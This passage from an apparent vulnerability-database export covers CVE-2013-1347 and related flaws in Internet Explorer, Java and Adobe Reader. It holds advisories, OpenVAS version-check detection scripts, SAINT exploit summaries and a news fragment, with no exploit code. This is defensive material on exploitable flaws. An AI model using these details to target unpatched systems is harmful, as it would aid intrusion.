11 \n * Sun JDK (Windows Production Release) 1.6.0 13 \n * Sun JDK (Windows Production Release) 1.6.0 14 \n * Sun JDK (Windows Production Release) 1.6.0 15 \n * Sun JDK (Windows Production Release) 1.6.0 18 \n * Sun JDK (Windows Production Release) 1.6.0 19 \n * Sun JDK (Windows Production Release) 1.6.0 20 \n * Sun JDK (Windows Production Release) 1.6.0 \n * Sun JDK (Windows Production Release) 1.6.0_21 \n * Sun JRE (Linux Production Release) 1.6.0 17 \n * Sun JRE (Linux Production Release) 1.6.0 01 \n * Sun JRE (Linux Production Release) 1.6.0 02 \n * Sun JRE (Linux Production Release) 1.6.0 03 \n * Sun JRE (Linux Production Release) 1.6.0 04 \n * Sun JRE (Linux Production Release) 1.6.0 05 \n * Sun JRE (Linux Production Release) 1.6.0 06 \n * Sun JRE (Linux Production Release) 1.6.0 07 \n * Sun JRE (Linux Production Release) 1.6.0 10 \n * Sun JRE (Linux Production Release) 1.6.0 11 \n * Sun JRE (Linux Production Release) 1.6.0 12 \n * Sun JRE (Linux Production Release) 1.6.0 13 \n * Sun JRE (Linux Production Release) 1.6.0 14 \n * Sun JRE (Linux Production Release) 1.6.0 15 \n * Sun JRE (Linux Production Release) 1.6.0 18 \n * Sun JRE (Linux Production Release) 1.6.0 19 \n * Sun JRE (Linux Production Release) 1.6.0 20 \n * Sun JRE (Linux Production Release) 1.6.0 \n * Sun JRE (Linux Production Release) 1.6.0_21 \n * Sun JRE (Linux Production Release) 1.7 \n * Sun JRE (Solaris Production Release) 1.6.0 17 \n * Sun JRE (Solaris Production Release) 1.6.0 01 \n * Sun JRE (Solaris Production Release) 1.6.0 02 \n * Sun JRE (Solaris Production Release) 1.6.0 03 \n * Sun JRE (Solaris Production Release) 1.6.0 04 \n * Sun JRE (Solaris Production Release) 1.6.0 05 \n * Sun JRE (Solaris Production Release) 1.6.0 06 \n * Sun JRE (Solaris Production Release) 1.6.0 07 \n * Sun JRE (Solaris Production Release) 1.6.0 10 \n * Sun JRE (Solaris Production Release) 1.6.0 11 \n * Sun JRE (Solaris Production Release) 1.6.0 12 \n * Sun JRE (Solaris Production Release) 1.6.0 13 \n * Sun JRE (Solaris Production Release) 1.6.0 14 \n * Sun JRE (Solaris Production Release) 1.6.0 15 \n * Sun JRE (Solaris Production Release) 1.6.0 18 \n * Sun JRE (Solaris Production Release) 1.6.0 19 \n * Sun JRE (Solaris Production Release) 1.6.0 2 \n * Sun JRE (Solaris Production Release) 1.6.0 \n * Sun JRE (Solaris Production Release) 1.6.0_21 \n * Sun JRE (Solaris Production Release) 1.7 \n * Sun JRE (Windows Production Release) 1.6.0 17 \n * Sun JRE (Windows Production Release) 1.6.0 01 \n * Sun JRE (Windows Production Release) 1.6.0 02 \n * Sun JRE (Windows Production Release) 1.6.0 03 \n * Sun JRE (Windows Production Release) 1.6.0 04 \n * Sun JRE (Windows Production Release) 1.6.0 05 \n * Sun JRE (Windows Production Release) 1.6.0 06 \n * Sun JRE (Windows Production Release) 1.6.0 07 \n * Sun JRE (Windows Production Release) 1.6.0 10 \n * Sun JRE (Windows Production Release) 1.6.0 11 \n * Sun JRE (Windows Production Release) 1.6.0 12 \n * Sun JRE (Windows Production Release) 1.6.0 13 \n * Sun JRE (Windows Production Release) 1.6.0 14 \n * Sun JRE (Windows Production Release) 1.6.0 15 \n * Sun JRE (Windows Production Release) 1.6.0 18 \n * Sun JRE (Windows Production Release) 1.6.0 19 \n * Sun JRE (Windows Production Release) 1.6.0 2 \n * Sun JRE (Windows Production Release) 1.6.0 20 \n * Sun JRE (Windows Production Release) 1.6.0 \n * Sun JRE (Windows Production Release) 1.6.0_21 \n * Sun JRE (Windows Production Release) 1.7 \n * Ubuntu Ubuntu Linux 10.04 ARM \n * Ubuntu Ubuntu Linux 10.04 Amd64 \n * Ubuntu Ubuntu Linux 10.04 I386 \n * Ubuntu Ubuntu Linux 10.04 Powerpc \n * Ubuntu Ubuntu Linux 10.04 Sparc \n * Ubuntu Ubuntu Linux 10.10 ARM \n * Ubuntu Ubuntu Linux 10.10 amd64 \n * Ubuntu Ubuntu Linux 10.10 i386 \n * Ubuntu Ubuntu Linux 10.10 powerpc \n * Ubuntu Ubuntu Linux 11.04 ARM \n * Ubuntu Ubuntu Linux 11.04 amd64 \n * Ubuntu Ubuntu Linux 11.04 i386 \n * Ubuntu Ubuntu Linux 11.04 powerpc \n * Ubuntu Ubuntu Linux 11.10 amd64 \n * Ubuntu Ubuntu Linux 11.10 i386 \n * VMWare ESX 3.5 \n * VMWare ESX 4.0 \n * VMWare ESX 4.1 \n * VMWare Update Manager 5.0 \n * VMWare VirtualCenter 2.5 \n * VMWare vCenter 4.0 \n * VMWare vCenter 4.1 \n * VMWare vCenter 5.0 \n * Xerox FreeFlow Print Server (FFPS) 73.B3.61 \n * Xerox FreeFlow Print Server (FFPS) 73.C0.41 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nFilter access to the affected computer at the network boundary if global access isn't needed. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity including unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Set web browser security to disable the execution of script code or active content.** \nDisabling the execution of script code in the browser may limit exposure to this and other latent vulnerabilities.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo limit the impact of latent vulnerabilities, configure applications to run as a nonadministrative user with minimal access rights.\n\nUpdates are available. Please see the references for more information. The payloads delivered by the exploit kits are detected by Symantec as 'Trojan.Zbot' and 'Trojan.Horse'.\n", "modified": "2011-10-18T00:00:00", "published": "2011-10-18T00:00:00", "id": "SMNTC-50218", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/50218", "type": "symantec", "title": "Oracle Java SE Rhino Script Engine Remote Code Execution Vulnerability", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-12T06:25:05", "bulletinFamily": "software", "cvelist": ["CVE-2013-1347", "CVE-2010-0188"], "description": "### Description\n\nAdobe Acrobat and Reader are prone to a remote code-execution vulnerability. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. The following products are affected: Reader 9.3 for Windows, Macintosh, and UNIX Acrobat 9.3 for Windows and Macintosh Reader 8.2 for Windows and Macintosh Acrobat 8.2 for Windows and Macintosh NOTE: This BID was originally titled 'Adobe Acrobat and Reader APSB10-07 Unspecified Security Vulnerabilities' but has been updated with the release of the Adobe patches. NOTE (February 19, 2010): Reports indicate that this issue may be related to the vulnerability discussed in BID 19283 (LibTIFF TiffFetchShortPair Remote Buffer Overflow Vulnerability). We will update this BID as more information emerges.\n\n### Technologies Affected\n\n * Adobe Acrobat 9.1.1 \n * Adobe Acrobat 9.2 \n * Adobe Acrobat 9.3 \n * Adobe Acrobat Professional 8.0 \n * Adobe Acrobat Professional 8.1 \n * Adobe Acrobat Professional 8.1.1 \n * Adobe Acrobat Professional 8.1.2 \n * Adobe Acrobat Professional 8.1.2 Security Update 1 \n * Adobe Acrobat Professional 8.1.3 \n * Adobe Acrobat Professional 8.1.4 \n * Adobe Acrobat Professional 8.1.6 \n * Adobe Acrobat Professional 8.1.7 \n * Adobe Acrobat Professional 8.2 \n * Adobe Acrobat Professional 9 \n * Adobe Acrobat Professional 9.1 \n * Adobe Acrobat Professional 9.1.2 \n * Adobe Acrobat Professional 9.1.3 \n * Adobe Acrobat Professional 9.2 \n * Adobe Acrobat Professional 9.3 \n * Adobe Acrobat Standard 8.0 \n * Adobe Acrobat Standard 8.1 \n * Adobe Acrobat Standard 8.1.1 \n * Adobe Acrobat Standard 8.1.2 \n * Adobe Acrobat Standard 8.1.3 \n * Adobe Acrobat Standard 8.1.4 \n * Adobe Acrobat Standard 8.1.6 \n * Adobe Acrobat Standard 8.1.7 \n * Adobe Acrobat Standard 8.2 \n * Adobe Acrobat Standard 9 \n * Adobe Acrobat Standard 9.1 \n * Adobe Acrobat Standard 9.1.2 \n * Adobe Acrobat Standard 9.1.3 \n * Adobe Acrobat Standard 9.2 \n * Adobe Acrobat Standard 9.3 \n * Adobe Reader 8.0 \n * Adobe Reader 8.1 \n * Adobe Reader 8.1.1 \n * Adobe Reader 8.1.2 \n * Adobe Reader 8.1.2 Security Update 1 \n * Adobe Reader 8.1.3 \n * Adobe Reader 8.1.4 \n * Adobe Reader 8.1.5 \n * Adobe Reader 8.1.6 \n * Adobe Reader 8.1.7 \n * Adobe Reader 8.2 \n * Adobe Reader 9 \n * Adobe Reader 9.1 \n * Adobe Reader 9.1.1 \n * Adobe Reader 9.1.2 \n * Adobe Reader 9.1.3 \n * Adobe Reader 9.2 \n * Adobe Reader 9.3 \n * Gentoo Linux \n * Redhat Enterprise Linux Desktop 5 Client \n * Redhat Enterprise Linux Desktop Supplementary 5 Client \n * Redhat Enterprise Linux ES 4.8.Z \n * Redhat Enterprise Linux ES Extras 4 \n * Redhat Enterprise Linux EUS 5.4.Z Server \n * SuSE Moblin 2.0 \n * SuSE SUSE Linux Enterprise 11 \n * SuSE Suse Linux Enterprise Desktop 10 SP2 \n * SuSE Suse Linux Enterprise Desktop 10 SP3 \n * SuSE openSUSE 11.0 \n * SuSE openSUSE 11.1 \n * SuSE openSUSE 11.2 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nIf global access isn't needed, filter access to the affected computer at the network boundary. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from a successful exploit. \n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo limit exposure to these and other latent vulnerabilities, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nTo reduce the likelihood of attacks, never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources.\n\n**Set web browser security to disable the execution of script code or active content.** \nDisable support for script code and active content within a client browser to reduce the chances of a successful exploit. Note that this mitigation tactic might adversely affect legitimate websites that rely on the execution of browser-based script code.\n\n**Implement multiple redundant layers of security.** \nAs an added precaution, deploy memory-protection schemes (such as nonexecutable stack/heap configuration and randomly mapped memory segments). This may complicate exploits of memory-corruption vulnerabilities.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, run applications with the minimal amount of privileges required for functionality. \n\nUpdates are available. Please see the references for more information. The payloads delivered by the exploit kits are detected by Symantec as 'Trojan.Zbot' and 'Trojan.Horse'.\n", "modified": "2010-02-11T00:00:00", "published": "2010-02-11T00:00:00", "id": "SMNTC-38195", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/38195", "type": "symantec", "title": "Adobe Acrobat and Reader CVE-2010-0188 Remote Code Execution Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T17:44:16", "description": "No description provided by source.", "published": "2013-05-07T00:00:00", "title": "Microsoft IE 8\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e(CVE-2013-1347)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1347"], "modified": "2013-05-07T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60781", "id": "SSV:60781", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:42:39", "description": "No description provided by source.", "published": "2013-05-17T00:00:00", "title": "Microsoft Internet Explorer \u91ca\u653e\u540e\u91cd\u7528\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e(CVE-2013-1347)(MS13-038)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1347"], "modified": "2013-05-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60790", "id": "SSV:60790", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}], "openvas": [{"lastseen": "2017-07-02T21:11:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1347"], "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS13-038.", "modified": "2017-05-12T00:00:00", "published": "2013-05-06T00:00:00", "id": "OPENVAS:803395", "href": "http://plugins.openvas.org/nasl.php?oid=803395", "type": "openvas", "title": "MS Internet Explorer Remote Code Execution Vulnerability (2847140)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ms_ie_remote_code_exe_vuln_2847140.nasl 6115 2017-05-12 09:03:25Z teissa $\n#\n# MS Internet Explorer Remote Code Execution Vulnerability (2847140)\n#\n# Authors:\n# Arun Kallavi <karun@secpod.com>\n#\n# Updated By Thanga Prakash S <tprakash@secpod.com> on 2013-05-15\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow remote attackers to execute arbitrary code\n and failed attacks will cause denial of service conditions.\n Impact Level: System/Application\";\n\ntag_affected = \"Microsoft Internet Explorer version 8.x and 9.x\";\ntag_insight = \"use-after-free error when handling 'CGenericElement'\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://technet.microsoft.com/en-us/security/bulletin/ms13-038\";\ntag_summary = \"This host is missing a critical security update according to\n Microsoft Bulletin MS13-038.\";\n\nif(description)\n{\n script_id(803395);\n script_version(\"$Revision: 6115 $\");\n script_cve_id(\"CVE-2013-1347\");\n script_bugtraq_id(59641);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-05-12 11:03:25 +0200 (Fri, 12 May 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-05-06 18:35:10 +0530 (Mon, 06 May 2013)\");\n script_name(\"MS Internet Explorer Remote Code Execution Vulnerability (2847140)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/53314\");\n script_xref(name : \"URL\" , value : \"http://support.microsoft.com/kb/2847140\");\n script_xref(name : \"URL\" , value : \"http://www.exploit-db.com/exploits/25294\");\n script_xref(name : \"URL\" , value : \"https://technet.microsoft.com/en-us/security/bulletin/ms13-038\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_ms_ie_detect.nasl\");\n script_mandatory_keys(\"MS/IE/Version\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n## Variables Initialization\nsysPath = \"\";\nieVer = \"\";\ndllVer = NULL;\n\n## Check for OS and Service Pack\nif(hotfix_check_sp(xp:4, win2003:3, winVista:3, win7:2, win2008:3) <= 0){\n exit(0);\n}\n\n## Get IE Version from KB\nieVer = get_kb_item(\"MS/IE/Version\");\nif(!ieVer || !(ieVer =~ \"^(8|9)\")){\n exit(0);\n}\n\n## Get System Path\nsysPath = smb_get_systemroot();\nif(!sysPath ){\n exit(0);\n}\n\n## Get Version from Mshtml.dll\ndllVer = fetch_file_version(sysPath, file_name:\"system32\\Mshtml.dll\");\nif(!dllVer){\n exit(0);\n}\n\n## Windows XP and 2003\nif(hotfix_check_sp(xp:4, win2003:3) > 0)\n{\n ## Check for Mshtml.dll version\n if(version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.23486\")){\n security_message(0);\n }\n exit(0);\n}\n\n## Windows Vista and Windows Server 2008\nelse if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n ## Check for Mshtml.dll version\n if(version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19420\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23486\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.16000\", test_version2:\"9.0.8112.16483\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.20000\", test_version2:\"9.0.8112.20593\")){\n security_message(0);\n }\n exit(0);\n}\n\n## Windows 7\nelse if(hotfix_check_sp(win7:2) > 0)\n{\n ## Check for Mshtml.dll version\n if(version_in_range(version:dllVer, test_version:\"8.0.7601.16000\", test_version2:\"8.0.7601.18128\")||\n version_in_range(version:dllVer, test_version:\"8.0.7601.21000\", test_version2:\"8.0.7601.22298\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.16000\", test_version2:\"9.0.8112.16483\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.20000\", test_version2:\"9.0.8112.20593\")){\n security_message(0);\n }\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-06-10T19:53:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1347"], "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS13-038.", "modified": "2020-06-09T00:00:00", "published": "2013-05-06T00:00:00", "id": "OPENVAS:1361412562310803395", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803395", "type": "openvas", "title": "MS Internet Explorer Remote Code Execution Vulnerability (2847140)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# MS Internet Explorer Remote Code Execution Vulnerability (2847140)\n#\n# Authors:\n# Arun Kallavi <karun@secpod.com>\n#\n# Updated By Thanga Prakash S <tprakash@secpod.com> on 2013-05-15\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803395\");\n script_version(\"2020-06-09T08:59:39+0000\");\n script_cve_id(\"CVE-2013-1347\");\n script_bugtraq_id(59641);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 08:59:39 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-05-06 18:35:10 +0530 (Mon, 06 May 2013)\");\n script_name(\"MS Internet Explorer Remote Code Execution Vulnerability (2847140)\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2847140\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/25294\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/en-us/security/bulletin/ms13-038\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_ms_ie_detect.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"MS/IE/Version\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to execute arbitrary code\n and failed attacks will cause denial of service conditions.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Internet Explorer version 8.x and 9.x.\");\n\n script_tag(name:\"insight\", value:\"use-after-free error when handling 'CGenericElement'\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS13-038.\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, win2003:3, winVista:3, win7:2, win2008:3) <= 0){\n exit(0);\n}\n\nieVer = get_kb_item(\"MS/IE/Version\");\nif(!ieVer || ieVer !~ \"^[89]\\.\"){\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(!sysPath ){\n exit(0);\n}\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Mshtml.dll\");\nif(!dllVer){\n exit(0);\n}\n\nif(hotfix_check_sp(xp:4, win2003:3) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.23486\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19420\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23486\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.16000\", test_version2:\"9.0.8112.16483\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.20000\", test_version2:\"9.0.8112.20593\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(win7:2) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"8.0.7601.16000\", test_version2:\"8.0.7601.18128\")||\n version_in_range(version:dllVer, test_version:\"8.0.7601.21000\", test_version2:\"8.0.7601.22298\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.16000\", test_version2:\"9.0.8112.16483\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.20000\", test_version2:\"9.0.8112.20593\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2019-06-04T23:19:37", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1347"], "description": "Added: 05/08/2013 \nCVE: [CVE-2013-1347](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1347>) \nBID: [59641](<http://www.securityfocus.com/bid/59641>) \nOSVDB: [92993](<http://www.osvdb.org/92993>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nWhen Internet Explorer attempts to access an object in memory that has been deleted, it may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. This use-after-free vulnerability is triggered when handling CGenericElement objects. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 13-028](<https://technet.microsoft.com/en-us/security/bulletin/ms13-028>). \n\n### References\n\n<http://technet.microsoft.com/en-us/security/advisory/2847140> \n<https://technet.microsoft.com/en-us/security/bulletin/ms13-028> \n\n\n### Limitations\n\nThis exploit was tested against Microsoft Internet Explorer 8 on Microsoft Windows XP SP3 English (DEP OptIn) and Microsoft Windows 7 SP1 (DEP OptIn). \n\nSuccessful exploit on Windows 7 requires that JRE 6 be installed. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2013-05-08T00:00:00", "published": "2013-05-08T00:00:00", "id": "SAINT:ADB3400FCF70345A44024ACACFAE55FE", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ie_cgenericelement_memory_corruption", "title": "Internet Explorer CGenericElement Object Use-after-free Vulnerability", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:02:01", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1347"], "description": "Added: 05/08/2013 \nCVE: [CVE-2013-1347](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1347>) \nBID: [59641](<http://www.securityfocus.com/bid/59641>) \nOSVDB: [92993](<http://www.osvdb.org/92993>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nWhen Internet Explorer attempts to access an object in memory that has been deleted, it may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. This use-after-free vulnerability is triggered when handling CGenericElement objects. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 13-028](<https://technet.microsoft.com/en-us/security/bulletin/ms13-028>). \n\n### References\n\n<http://technet.microsoft.com/en-us/security/advisory/2847140> \n<https://technet.microsoft.com/en-us/security/bulletin/ms13-028> \n\n\n### Limitations\n\nThis exploit was tested against Microsoft Internet Explorer 8 on Microsoft Windows XP SP3 English (DEP OptIn) and Microsoft Windows 7 SP1 (DEP OptIn). \n\nSuccessful exploit on Windows 7 requires that JRE 6 be installed. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2013-05-08T00:00:00", "published": "2013-05-08T00:00:00", "id": "SAINT:3EF0C66878E70BB3C355385365B1DFBF", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/ie_cgenericelement_memory_corruption", "type": "saint", "title": "Internet Explorer CGenericElement Object Use-after-free Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T19:19:21", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1347"], "edition": 2, "description": "Added: 05/08/2013 \nCVE: [CVE-2013-1347](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1347>) \nBID: [59641](<http://www.securityfocus.com/bid/59641>) \nOSVDB: [92993](<http://www.osvdb.org/92993>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nWhen Internet Explorer attempts to access an object in memory that has been deleted, it may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. This use-after-free vulnerability is triggered when handling CGenericElement objects. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 13-028](<https://technet.microsoft.com/en-us/security/bulletin/ms13-028>). \n\n### References\n\n<http://technet.microsoft.com/en-us/security/advisory/2847140> \n<https://technet.microsoft.com/en-us/security/bulletin/ms13-028> \n\n\n### Limitations\n\nThis exploit was tested against Microsoft Internet Explorer 8 on Microsoft Windows XP SP3 English (DEP OptIn) and Microsoft Windows 7 SP1 (DEP OptIn). \n\nSuccessful exploit on Windows 7 requires that JRE 6 be installed. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2013-05-08T00:00:00", "published": "2013-05-08T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/ie_cgenericelement_memory_corruption", "id": "SAINT:530FA87FA097C35D9629E058CE3C1589", "type": "saint", "title": "Internet Explorer CGenericElement Object Use-after-free Vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T23:00:47", "bulletinFamily": "info", "cvelist": ["CVE-2013-1347"], "description": "Microsoft wasted no time today delivering a patch for the Internet Explorer 8 vulnerability being exploited in [watering hole attacks](<http://threatpost.com/watering-hole-attack-claims-us-department-of-labor-website/>) carried out against the U.S. Department of Labor website and nine others worldwide. Today\u2019s Patch Tuesday security updates also include a fix for IE vulnerabilities exploited during the Pwn2Own Contest earlier this year.\n\nDetails on the DoL attack quickly emerged following the initial reports on May 1 that the agency\u2019s Site Matrices Exposures site has been compromised and likely targeting DoE researchers working on nuclear weapons programs. This week it was revealed that a [site in Cambodia was also serving malware](<http://threatpost.com/usaid-workers-also-targeted-by-dol-watering-hole-attackers/>) exploiting IE 8 vulnerabilities targeting workers for the United States Agency for International Development (USAID).\n\nMicrosoft urges consumers and business users still on IE 8 to 